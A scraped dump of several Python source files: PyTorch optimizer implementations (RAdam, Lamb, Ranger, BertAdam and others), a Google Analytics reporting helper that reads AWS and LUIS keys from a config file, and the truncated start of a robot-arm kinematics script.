weight_decay=0,grad_averaging=False):
if lr < 0.0:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
defaults = dict(lr=lr, betas=betas, eps=eps,weight_decay=weight_decay,grad_averaging = grad_averaging)
super().__init__(params, defaults)
def step(self, closure=None):
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError('NovoGrad does not support sparse gradients')
state = self.state[p]
g_2 = torch.sum(grad ** 2)
if len(state) == 0:
state['step'] = 0
state['moments'] = grad.div(g_2.sqrt() +group['eps']) + \
group['weight_decay'] * p.data
state['grads_ema'] = g_2
moments = state['moments']
grads_ema = state['grads_ema']
beta1, beta2 = group['betas']
state['step'] += 1
grads_ema.mul_(beta2).add_(1 - beta2, g_2)
denom = grads_ema.sqrt().add_(group['eps'])
grad.div_(denom)
# weight decay
if group['weight_decay'] != 0:
decayed_weights = torch.mul(p.data, group['weight_decay'])
grad.add_(decayed_weights)
# Momentum --> SAG
if group['grad_averaging']:
grad.mul_(1.0 - beta1)
moments.mul_(beta1).add_(grad) # velocity
bias_correction1 = 1 - beta1 ** state['step']
bias_correction2 = 1 - beta2 ** state['step']
step_size = group['lr'] * math.sqrt(bias_correction2) / bias_correction1
p.data.add_(-step_size, moments)
return loss
class Lamb(Optimizer):
"""Implements the Lamb optimizer from https://arxiv.org/pdf/1904.00962v3.pdf
Args:
params (iterable): iterable of parameters to optimize or dicts defining parameter groups
lr (float, optional): learning rate
betas (Tuple[float, float], optional): coefficients used for computing running averages of gradient and its square (default: (0.9, 0.999))
eps (float, optional): term added to the denominator to improve numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
scale_clip (tuple, optional): the lower and upper bounds for the weight norm in local LR of LARS
Example:
>>> model = ResNet()
>>> optimizer = Lamb(model.parameters(), lr=1e-2, weight_decay=1e-5)
"""
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8, weight_decay=0,
scale_clip=None):
if not 0.0 <= lr:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= eps:
raise ValueError("Invalid epsilon value: {}".format(eps))
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
defaults = dict(lr=lr, betas=betas, eps=eps, weight_decay=weight_decay)
super(Lamb, self).__init__(params, defaults)
# LARS arguments
self.scale_clip = scale_clip
if self.scale_clip is None:
self.scale_clip = (0, 10)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError('RAdam does not support sparse gradients')
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['exp_avg'] = torch.zeros_like(p.data)
# Exponential moving average of squared gradient values
state['exp_avg_sq'] = torch.zeros_like(p.data)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
beta1, beta2 = group['betas']
state['step'] += 1
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(1 - beta1, grad)
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
# Gradient term correction
update = torch.zeros_like(p.data)
denom = exp_avg_sq.sqrt().add_(group['eps'])
update.addcdiv_(1, exp_avg, denom)
# Weight decay
if group['weight_decay'] != 0:
update.add_(group['weight_decay'], p.data)
# LARS
p_norm = p.data.pow(2).sum().sqrt()
update_norm = update.pow(2).sum().sqrt()
phi_p = p_norm.clamp(*self.scale_clip)
# Compute the local LR
if phi_p == 0 or update_norm == 0:
local_lr = 1
else:
local_lr = phi_p / update_norm
state['local_lr'] = local_lr
p.data.add_(-group['lr'] * local_lr, update)
return loss
class Lars(Optimizer):
r"""Implements the LARS optimizer from https://arxiv.org/pdf/1708.03888.pdf
Args:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float): learning rate
momentum (float, optional): momentum factor (default: 0)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
dampening (float, optional): dampening for momentum (default: 0)
nesterov (bool, optional): enables Nesterov momentum (default: False)
scale_clip (tuple, optional): the lower and upper bounds for the weight norm in local LR of LARS
Example:
>>> model = ResNet()
>>> optimizer = Lars(model.parameters(), lr=1e-2, weight_decay=1e-5)
"""
def __init__(self, params, lr, momentum=0, dampening=0,
weight_decay=0, nesterov=False, scale_clip=None):
if lr < 0.0:
raise ValueError("Invalid learning rate: {}".format(lr))
if momentum < 0.0:
raise ValueError("Invalid momentum value: {}".format(momentum))
if weight_decay < 0.0:
raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
defaults = dict(lr=lr, momentum=momentum, dampening=dampening,
weight_decay=weight_decay, nesterov=nesterov)
if nesterov and (momentum <= 0 or dampening != 0):
raise ValueError("Nesterov momentum requires a momentum and zero dampening")
super(Lars, self).__init__(params, defaults)
# LARS arguments
self.scale_clip = scale_clip
if self.scale_clip is None:
self.scale_clip = (0, 10)
def __setstate__(self, state):
super(Lars, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('nesterov', False)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
weight_decay = group['weight_decay']
momentum = group['momentum']
dampening = group['dampening']
nesterov = group['nesterov']
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad.data
if weight_decay != 0:
d_p.add_(weight_decay, p.data)
if momentum != 0:
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
buf = param_state['momentum_buffer'] = torch.clone(d_p).detach()
else:
buf = param_state['momentum_buffer']
buf.mul_(momentum).add_(1 - dampening, d_p)
if nesterov:
d_p = d_p.add(momentum, buf)
else:
d_p = buf
# LARS
p_norm = p.data.pow(2).sum().sqrt()
update_norm = d_p.pow(2).sum().sqrt()
# Compute the local LR
if p_norm == 0 or update_norm == 0:
local_lr = 1
else:
local_lr = p_norm / update_norm
p.data.add_(-group['lr'] * local_lr, d_p)
return loss
#
class RAdam(Optimizer):
"""Implements the RAdam optimizer from https://arxiv.org/pdf/1908.03265.pdf
Args:
params (iterable): iterable of parameters to optimize or dicts defining parameter groups
lr (float, optional): learning rate
betas (Tuple[float, float], optional): coefficients used for computing running averages of gradient and its square (default: (0.9, 0.999))
eps (float, optional): term added to the denominator to improve numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
Example:
>>> model = ResNet()
>>> optimizer = RAdam(model.parameters(), lr=0.001)
"""
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8, weight_decay=0):
if not 0.0 <= lr:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= eps:
raise ValueError("Invalid epsilon value: {}".format(eps))
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
defaults = dict(lr=lr, betas=betas, eps=eps, weight_decay=weight_decay)
super(RAdam, self).__init__(params, defaults)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
# Get group-shared variables
beta1, beta2 = group['betas']
sma_inf = group.get('sma_inf')
# Compute max length of SMA on first step
if not isinstance(sma_inf, float):
group['sma_inf'] = 2 / (1 - beta2) - 1
sma_inf = group.get('sma_inf')
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError('RAdam does not support sparse gradients')
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['exp_avg'] = torch.zeros_like(p.data)
# Exponential moving average of squared gradient values
state['exp_avg_sq'] = torch.zeros_like(p.data)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
state['step'] += 1
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(1 - beta1, grad)
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
# Bias corrections
bias_correction1 = 1 - beta1 ** state['step']
bias_correction2 = 1 - beta2 ** state['step']
# Compute length of SMA
sma_t = sma_inf - 2 * state['step'] * (1 - bias_correction2) / bias_correction2
# Weight decay
if group['weight_decay'] != 0:
p.data.add_(-group['lr'] * group['weight_decay'], p.data)
if sma_t > 4:
# Variance rectification term
r_t = math.sqrt((sma_t - 4) * (sma_t - 2) * sma_inf / ((sma_inf - 4) * (sma_inf - 2) * sma_t))
# Adaptive momentum
p.data.addcdiv_(-group['lr'] * r_t, exp_avg / bias_correction1, (exp_avg_sq / bias_correction2).sqrt().add_(group['eps']))
else:
# Unadapted momentum
p.data.add_(-group['lr'], exp_avg / bias_correction1)
return loss
class Ralamb(Optimizer):
'''
RAdam + LARS
Example:
>>> model = ResNet()
>>> optimizer = Ralamb(model.parameters(), lr=0.001)
'''
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8, weight_decay=0):
defaults = dict(lr=lr, betas=betas, eps=eps, weight_decay=weight_decay)
self.buffer = [[None, None, None] for ind in range(10)]
super(Ralamb, self).__init__(params, defaults)
def __setstate__(self, state):
super(Ralamb, self).__setstate__(state)
def step(self, closure=None):
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data.float()
if grad.is_sparse:
raise RuntimeError('Ralamb does not support sparse gradients')
p_data_fp32 = p.data.float()
state = self.state[p]
if len(state) == 0:
state['step'] = 0
state['exp_avg'] = torch.zeros_like(p_data_fp32)
state['exp_avg_sq'] = torch.zeros_like(p_data_fp32)
else:
state['exp_avg'] = state['exp_avg'].type_as(p_data_fp32)
state['exp_avg_sq'] = state['exp_avg_sq'].type_as(p_data_fp32)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
beta1, beta2 = group['betas']
# Decay the first and second moment running average coefficient
# m_t
exp_avg.mul_(beta1).add_(1 - beta1, grad)
# v_t
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
state['step'] += 1
buffered = self.buffer[int(state['step'] % 10)]
if state['step'] == buffered[0]:
N_sma, radam_step_size = buffered[1], buffered[2]
else:
buffered[0] = state['step']
beta2_t = beta2 ** state['step']
N_sma_max = 2 / (1 - beta2) - 1
N_sma = N_sma_max - 2 * state['step'] * beta2_t / (1 - beta2_t)
buffered[1] = N_sma
# more conservative since it's an approximated value
if N_sma >= 5:
radam_step_size = math.sqrt((1 - beta2_t) * (N_sma - 4) / (N_sma_max - 4) * (N_sma - 2) / N_sma * N_sma_max / (N_sma_max - 2)) / (1 - beta1 ** state['step'])
else:
radam_step_size = 1.0 / (1 - beta1 ** state['step'])
buffered[2] = radam_step_size
if group['weight_decay'] != 0:
p_data_fp32.add_(-group['weight_decay'] * group['lr'], p_data_fp32)
# more conservative since it's an approximated value
radam_step = p_data_fp32.clone()
if N_sma >= 5:
denom = exp_avg_sq.sqrt().add_(group['eps'])
radam_step.addcdiv_(-radam_step_size * group['lr'], exp_avg, denom)
else:
radam_step.add_(-radam_step_size * group['lr'], exp_avg)
radam_norm = radam_step.pow(2).sum().sqrt()
weight_norm = p.data.pow(2).sum().sqrt().clamp(0, 10)
if weight_norm == 0 or radam_norm == 0:
trust_ratio = 1
else:
trust_ratio = weight_norm / radam_norm
state['weight_norm'] = weight_norm
state['adam_norm'] = radam_norm
state['trust_ratio'] = trust_ratio
if N_sma >= 5:
p_data_fp32.addcdiv_(-radam_step_size * group['lr'] * trust_ratio, exp_avg, denom)
else:
p_data_fp32.add_(-radam_step_size * group['lr'] * trust_ratio, exp_avg)
p.data.copy_(p_data_fp32)
return loss
class Lookahead(Optimizer):
'''
a PyTorch implementation of the Lookahead Optimizer from th paper
Lookahead Optimizer: k steps forward, 1 step back.
https://arxiv.org/abs/1907.08610
Example:
>>> import torch.optim as optim
>>> base_optimizer = optim.Adam(model.parameters(), lr=0.001)
>>> optimizer = Lookahead(base_optimizer=base_optimizer,k=5,alpha=0.5)
'''
def __init__(self, base_optimizer,alpha=0.5, k=6):
if not 0.0 <= alpha <= 1.0:
raise ValueError(f'Invalid slow update rate: {alpha}')
if not 1 <= k:
raise ValueError(f'Invalid lookahead steps: {k}')
self.optimizer = base_optimizer
self.param_groups = self.optimizer.param_groups
self.alpha = alpha
self.k = k
for group in self.param_groups:
group["step_counter"] = 0
self.slow_weights = [[p.clone().detach() for p in group['params']]
for group in self.param_groups]
for w in it.chain(*self.slow_weights):
w.requires_grad = False
def step(self, closure=None):
loss = None
if closure is not None:
loss = closure()
loss = self.optimizer.step()
for group,slow_weights in zip(self.param_groups,self.slow_weights):
group['step_counter'] += 1
if group['step_counter'] % self.k != 0:
continue
for p,q in zip(group['params'],slow_weights):
if p.grad is None:
continue
q.data.add_(self.alpha,p.data - q.data)
p.data.copy_(q.data)
return loss
class RaLars(Optimizer):
"""Implements the RAdam optimizer from https://arxiv.org/pdf/1908.03265.pdf
with optional Layer-wise adaptive Scaling from https://arxiv.org/pdf/1708.03888.pdf
Args:
params (iterable): iterable of parameters to optimize or dicts defining parameter groups
lr (float, optional): learning rate
betas (Tuple[float, float], optional): coefficients used for computing running averages of gradient and its square (default: (0.9, 0.999))
eps (float, optional): term added to the denominator to improve numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
scale_clip (float, optional): the maximal upper bound for the scale factor of LARS
Example:
>>> model = ResNet()
>>> optimizer = RaLars(model.parameters(), lr=0.001)
"""
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8, weight_decay=0,
scale_clip=None):
if not 0.0 <= lr:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= eps:
raise ValueError("Invalid epsilon value: {}".format(eps))
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
defaults = dict(lr=lr, betas=betas, eps=eps, weight_decay=weight_decay)
super(RaLars, self).__init__(params, defaults)
# LARS arguments
self.scale_clip = scale_clip
if self.scale_clip is None:
self.scale_clip = (0, 10)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
# Get group-shared variables
beta1, beta2 = group['betas']
sma_inf = group.get('sma_inf')
# Compute max length of SMA on first step
if not isinstance(sma_inf, float):
group['sma_inf'] = 2 / (1 - beta2) - 1
sma_inf = group.get('sma_inf')
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError('RAdam does not support sparse gradients')
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['exp_avg'] = torch.zeros_like(p.data)
# Exponential moving average of squared gradient values
state['exp_avg_sq'] = torch.zeros_like(p.data)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
state['step'] += 1
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(1 - beta1, grad)
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
# Bias correction
bias_correction1 = 1 - beta1 ** state['step']
bias_correction2 = 1 - beta2 ** state['step']
# Compute length of SMA
sma_t = sma_inf - 2 * state['step'] * (1 - bias_correction2) / bias_correction2
update = torch.zeros_like(p.data)
if sma_t > 4:
# Variance rectification term
r_t = math.sqrt((sma_t - 4) * (sma_t - 2) * sma_inf / ((sma_inf - 4) * (sma_inf - 2) * sma_t))
# Adaptive momentum
update.addcdiv_(r_t, exp_avg / bias_correction1, (exp_avg_sq / bias_correction2).sqrt().add_(group['eps']))
else:
# Unadapted momentum
update.add_(exp_avg / bias_correction1)
# Weight decay
if group['weight_decay'] != 0:
update.add_(group['weight_decay'], p.data)
# LARS
p_norm = p.data.pow(2).sum().sqrt()
update_norm = update.pow(2).sum().sqrt()
phi_p = p_norm.clamp(*self.scale_clip)
# Compute the local LR
if phi_p == 0 or update_norm == 0:
local_lr = 1
else:
local_lr = phi_p / update_norm
state['local_lr'] = local_lr
p.data.add_(-group['lr'] * local_lr, update)
return loss
class Ranger(Optimizer):
'''
Ranger - a synergistic optimizer combining RAdam (Rectified Adam) and LookAhead in one codebase.
full refactoring for slow weights and one pass handling (vs two before).
Refactor should eliminate any random save/load issues regarding memory.
1 - Ranger is the optimizer we used to beat the high scores for 12 different categories on the FastAI leaderboards!
(Previous records all held with AdamW optimizer).
2 - Highly recommend combining Ranger with: Mish activation function, and flat+ cosine anneal training curve.
3 - Based on that, also found .95 is better than .90 for beta1 (momentum) param (ala betas=(0.95, 0.999)).
Example:
>>> model = ResNet()
>>> optimizer = Ranger(model.parameters(), lr=0.001)
'''
def __init__(self, params, lr=1e-3, alpha=0.5, k=6, N_sma_threshhold=5, betas=(.95,0.999), eps=1e-5, weight_decay=0):
#parameter checks
if not 0.0 <= alpha <= 1.0:
raise ValueError(f'Invalid slow update rate: {alpha}')
if not 1 <= k:
raise ValueError(f'Invalid lookahead steps: {k}')
if not lr > 0:
raise ValueError(f'Invalid Learning Rate: {lr}')
if not eps > 0:
raise ValueError(f'Invalid eps: {eps}')
#parameter comments:
# beta1 (momentum) of .95 seems to work better than .90...
#N_sma_threshold of 5 seems better in testing than 4.
#In both cases, worth testing on your dataset (.90 vs .95, 4 vs 5) to make sure which works best for you.
#prep defaults and init torch.optim base
defaults = dict(lr=lr, alpha=alpha, k=k, step_counter=0, betas=betas, N_sma_threshhold=N_sma_threshhold, eps=eps, weight_decay=weight_decay)
super().__init__(params,defaults)
#adjustable threshold
self.N_sma_threshhold = N_sma_threshhold
#now we can get to work...
#removed as we now use step from RAdam...no need for duplicate step counting
#for group in self.param_groups:
# group["step_counter"] = 0
#print("group step counter init")
#look ahead params
self.alpha = alpha
self.k = k
#radam buffer for state
self.radam_buffer = [[None,None,None] for ind in range(10)]
#self.first_run_check=0
#lookahead weights
#9/2/19 - lookahead param tensors have been moved to state storage.
#This should resolve issues with load/save where weights were left in GPU memory from first load, slowing down future runs.
#self.slow_weights = [[p.clone().detach() for p in group['params']]
# for group in self.param_groups]
#don't use grad for lookahead weights
#for w in it.chain(*self.slow_weights):
# w.requires_grad = False
def __setstate__(self, state):
print("set state called")
super(Ranger, self).__setstate__(state)
def step(self, closure=None):
loss = None
#note - below is commented out b/c I have other work that passes back the loss as a float, and thus not a callable closure.
#Uncomment if you need to use the actual closure...
#if closure is not None:
#loss = closure()
#Evaluate averages and grad, update param tensors
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data.float()
if grad.is_sparse:
raise RuntimeError('Ranger optimizer does not support sparse gradients')
p_data_fp32 = p.data.float()
state = self.state[p] #get state dict for this param
if len(state) == 0: #if first time to run...init dictionary with our desired entries
#if self.first_run_check==0:
#self.first_run_check=1
#print("Initializing slow buffer...should not see this at load from saved model!")
state['step'] = 0
state['exp_avg'] = torch.zeros_like(p_data_fp32)
state['exp_avg_sq'] = torch.zeros_like(p_data_fp32)
#look ahead weight storage now in state dict
state['slow_buffer'] = torch.empty_like(p.data)
state['slow_buffer'].copy_(p.data)
else:
state['exp_avg'] = state['exp_avg'].type_as(p_data_fp32)
state['exp_avg_sq'] = state['exp_avg_sq'].type_as(p_data_fp32)
#begin computations
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
beta1, beta2 = group['betas']
#compute variance mov avg
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
#compute mean moving avg
exp_avg.mul_(beta1).add_(1 - beta1, grad)
state['step'] += 1
buffered = self.radam_buffer[int(state['step'] % 10)]
if state['step'] == buffered[0]:
N_sma, step_size = buffered[1], buffered[2]
else:
buffered[0] = state['step']
beta2_t = beta2 ** state['step']
N_sma_max = 2 / (1 - beta2) - 1
N_sma = N_sma_max - 2 * state['step'] * beta2_t / (1 - beta2_t)
buffered[1] = N_sma
if N_sma > self.N_sma_threshhold:
step_size = math.sqrt((1 - beta2_t) * (N_sma - 4) / (N_sma_max - 4) * (N_sma - 2) / N_sma * N_sma_max / (N_sma_max - 2)) / (1 - beta1 ** state['step'])
else:
step_size = 1.0 / (1 - beta1 ** state['step'])
buffered[2] = step_size
if group['weight_decay'] != 0:
p_data_fp32.add_(-group['weight_decay'] * group['lr'], p_data_fp32)
if N_sma > self.N_sma_threshhold:
denom = exp_avg_sq.sqrt().add_(group['eps'])
p_data_fp32.addcdiv_(-step_size * group['lr'], exp_avg, denom)
else:
p_data_fp32.add_(-step_size * group['lr'], exp_avg)
p.data.copy_(p_data_fp32)
#integrated look ahead...
#we do it at the param level instead of group level
if state['step'] % group['k'] == 0:
slow_p = state['slow_buffer'] #get access to slow param tensor
slow_p.add_(self.alpha, p.data - slow_p) #(fast weights - slow weights) * alpha
p.data.copy_(slow_p) #copy interpolated weights to RAdam param tensor
return loss
class BertAdam(Optimizer):
"""Implements BERT version of Adam algorithm with weight decay fix.
Params:
lr: learning rate
warmup: portion of t_total for the warmup, -1 means no warmup. Default: -1
t_total: total number of training steps for the learning
rate schedule, -1 means constant learning rate. Default: -1
schedule: schedule to use for the warmup (see above). Default: 'warmup_linear'
b1: Adams b1. Default: 0.9
b2: Adams b2. Default: 0.999
e: Adams epsilon. Default: 1e-6
weight_decay: Weight decay. Default: 0.01
max_grad_norm: Maximum norm for the gradients (-1 means no clipping). Default: 1.0
"""
def __init__(self, params, lr, warmup=-1, t_total=-1, schedule='warmup_linear',
b1=0.9, b2=0.999, e=1e-6, weight_decay=0.01,
max_grad_norm=1.0):
if lr < 0.0:
raise ValueError("Invalid learning rate: {} - should be >= 0.0".format(lr))
if schedule not in SCHEDULES:
raise ValueError("Invalid schedule parameter: {}".format(schedule))
if not 0.0 <= warmup < 1.0 and not warmup == -1:
raise ValueError("Invalid warmup: {} - should be in [0.0, 1.0[ or -1".format(warmup))
if not 0.0 <= b1 < 1.0:
raise ValueError("Invalid b1 parameter: {} - should be in [0.0, 1.0[".format(b1))
if not 0.0 <= b2 < 1.0:
raise ValueError("Invalid b2 parameter: {} - should be in [0.0, 1.0[".format(b2))
if not e >= 0.0:
raise ValueError("Invalid epsilon value: {} - should be >= 0.0".format(e))
defaults = dict(lr=lr, schedule=schedule, warmup=warmup, t_total=t_total,
b1=b1, b2=b2, e=e, weight_decay=weight_decay,
max_grad_norm=max_grad_norm)
super(BertAdam, self).__init__(params, defaults)
def get_lr(self):
lr = []
for group in self.param_groups:
for p in group['params']:
state = self.state[p]
if len(state) == 0:
return [0]
if group['t_total'] != -1:
schedule_fct = SCHEDULES[group['schedule']]
lr_scheduled = group['lr'] * schedule_fct(state['step']/group['t_total'], group['warmup'])
else:
lr_scheduled = group['lr']
lr.append(lr_scheduled)
return lr
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError('Adam does not support sparse gradients, please consider SparseAdam instead')
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['next_m'] = torch.zeros_like(p.data)
# Exponential moving average of squared gradient values
state['next_v'] = torch.zeros_like(p.data)
next_m, next_v = state['next_m'], state['next_v']
beta1, beta2 = group['b1'], group['b2']
# Add grad clipping
if group['max_grad_norm'] > 0:
clip_grad_norm_(p, group['max_grad_norm'])
# Decay the first and second moment running average coefficient
# In-place operations to update the averages at the same time
next_m.mul_(beta1).add_(1 - beta1, grad)
next_v.mul_(beta2).addcmul_(1 - beta2, grad, grad)
update = next_m / (next_v.sqrt() + group['e'])
# Just adding the square of the weights to the loss function is *not*
# the correct way of using L2 regularization/weight decay with Adam,
# since that will interact with the m and v parameters in strange ways.
#
# Instead we want to decay the weights in a manner that doesn't interact
# with the m/v parameters. This is equivalent to adding the square
# of the weights to the loss with plain (non-momentum) SGD.
if group['weight_decay'] > 0.0:
update += group['weight_decay'] * p.data
if group['t_total'] != -1:
schedule_fct = SCHEDULES[group['schedule']]
lr_scheduled = group['lr'] * schedule_fct(state['step']/group['t_total'], group['warmup'])
else:
lr_scheduled = group['lr']
update_with_lr = lr_scheduled * update
p.data.add_(-update_with_lr)
state['step'] += 1
return loss | [
"1436496575@qq.com"
] | 1436496575@qq.com |
f06b4285ad8b969fb731db92a977644afcf202e1 | ad19975b9c86d5bb29d3c402e8ac55838bac78ba | /GA_project/ga_luis_report.py | a3d7463ec98a35f85992999bbf3a0967c9749aff | [] | no_license | data-skeptic/bot-survey-engine | 4053643a4fc3a714d8dabd55f3baefc6011ddadb | 724cc5f8a7dc245b9129abc7df7e306d6cea501a | refs/heads/master | 2021-01-16T18:11:13.569192 | 2017-12-01T23:43:18 | 2017-12-01T23:43:18 | 100,050,018 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 4,620 | py | import json
import os
import time
import boto3
import numpy as np
import sys
import pandas as pd
import matplotlib.pyplot as plt
#import parsedatetime as pdt # $ pip install parsedatetime
import requests
from tabulate import tabulate
from fuzzywuzzy import fuzz
from fuzzywuzzy import process
from gahelper.gahelper import Gahelper
from gahelper.gaformatter import format_dataframe
from datetime import datetime
from datetime import timedelta
class ga_report():
def __init__(self):
self.dir_path = os.path.dirname(os.path.realpath(__file__))
# print("/".join(self.dir_path.split("/")[0:-1]) + "/config/config.json")
config = json.load(open("/".join(self.dir_path.split("/")[0:-1]) + "/config/config.json"))
self.key = config['aws']['accessKeyId']
self.secret = config['aws']['secretAccessKey']
self.bucketname = config['aws']['bucket_name']
self.s3 = boto3.resource('s3', aws_access_key_id=self.key, aws_secret_access_key=self.secret)
self.config = config
self.luis_app_id = config['luis']['app_id']
self.luis_subscription_key = config['luis']['subscription_key']
self.standard_dims = []
with open(self.dir_path + "/data/dimensions.json") as f:
data = json.load(f)
for key, value in data.items():
self.standard_dims = self.standard_dims + value
self.standard_metrics = []
with open(self.dir_path + "/data/metrics.json") as f:
data = json.load(f)
for key, value in data.items():
self.standard_metrics = self.standard_metrics + value
return
# gahelper
def get_google_analytics(self,GA_items):
ga = Gahelper(self.config)
print("GA_items in get_google_analytics is ", GA_items)
if not GA_items.get('standard_metrics'):
f = {'img':"",'txt':""}
if not GA_items.get('start'): # start is missing
if GA_items.get('end'): # end is not missing
f = {'img': "", 'txt': "start missing"}
else:
f = {'img':"", 'txt':"date range is missing."}
else: # start is not missing
if not GA_items.get('end'): # end is missing
f = {'img': "", 'txt': "end missing"}
else:
metrics = GA_items.get('standard_metrics', [])
dimensions = GA_items.get('standard_dims',[])
if len(GA_items.get('start')) == 1:
start_date = str(GA_items.get('start')[-1])
end_date = str(GA_items.get('end')[-1])
else:
# if there are more than one pair of start and end, which one is right? Or need to combine all/both pairs?
# for the moment, use the last one. It is more likely to be the right one. For example, how many sessions per month in 2017? Then ['month', '2017'] will be returned. use the last one '2017'.
start_date = str(GA_items.get('start')[-1])
end_date = str(GA_items.get('end')[-1])
print(metrics, dimensions,start_date,end_date)
report = ga.get_report(metrics, dimensions, start_date, end_date)
print(tabulate(report, headers='keys', tablefmt='psql'))
f = format_dataframe(self.s3, self.bucketname, report, metrics, dimensions, start_date, end_date)
print(f)
return f
def run(self,GA_items): #
# GA_items = self.extract_ga_items(user_request)
# if GA_items.get('standard_metrics') and GA_items.get('start') and GA_items.get('end'):
# f = self.get_google_analytics(GA_items)
# else:
# f = {'img': "", 'txt': "Metric, start date and end date are necessary. At least one of them is missing."}
# return f
if GA_items.get('standard_metrics'):
if GA_items.get('start'):
if GA_items.get('end'):
f = self.get_google_analytics(GA_items)
else:
f = {'img': "", 'txt': "end missing'"}
elif GA_items.get('end'):
f = {'img': "", 'txt': "start missing"}
else:
f = {'img': "", 'txt': "date range missing"}
else:
f = {'img':"",'txt':""}
return f
# def test_run(user_request):
# ga_instance = ga()
# ga_instance.run(user_request)
# user_request = "What is the ad cost per week in January last year?"
# test_run(user_request)
if __name__ == '__main__':
pass
| [
"xfzhengnankai@gmail.com"
] | xfzhengnankai@gmail.com |
013a7e49d621e0e28d78cb0bc663558c82c505e6 | 76d658c1d033b93ec3c7fe7296eaa2078eb329f9 | /derc_2019/tagi/armWithTread2.py | 921c970dab87c686ada300dc8faa2b5eb035a314 | [] | no_license | DERC-code/derc_2020 | 04a499b28fb2807b4269c606e93b5e45df158882 | af1afdc3db4df76547aff52c389430270c447778 | refs/heads/master | 2023-01-11T11:26:17.668508 | 2020-11-14T05:41:45 | 2020-11-14T05:41:45 | 312,753,103 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,216 | py | import RPi.GPIO as GPIO
import time
import numpy as np
import math
import threading
L1 = 180
L2 = 140
locationX=100
locationY=100
locationZ=0
def calc(x, y, z):
Ld = np.sqrt((x ** 2)+(y ** 2)+(z ** 2))
rad1 = math.atan2(y, x)
radFor2=((L1 ** 2)+(Ld **2)-(L2 ** 2))/(2*L1*Ld)
if radFor2 > 1:
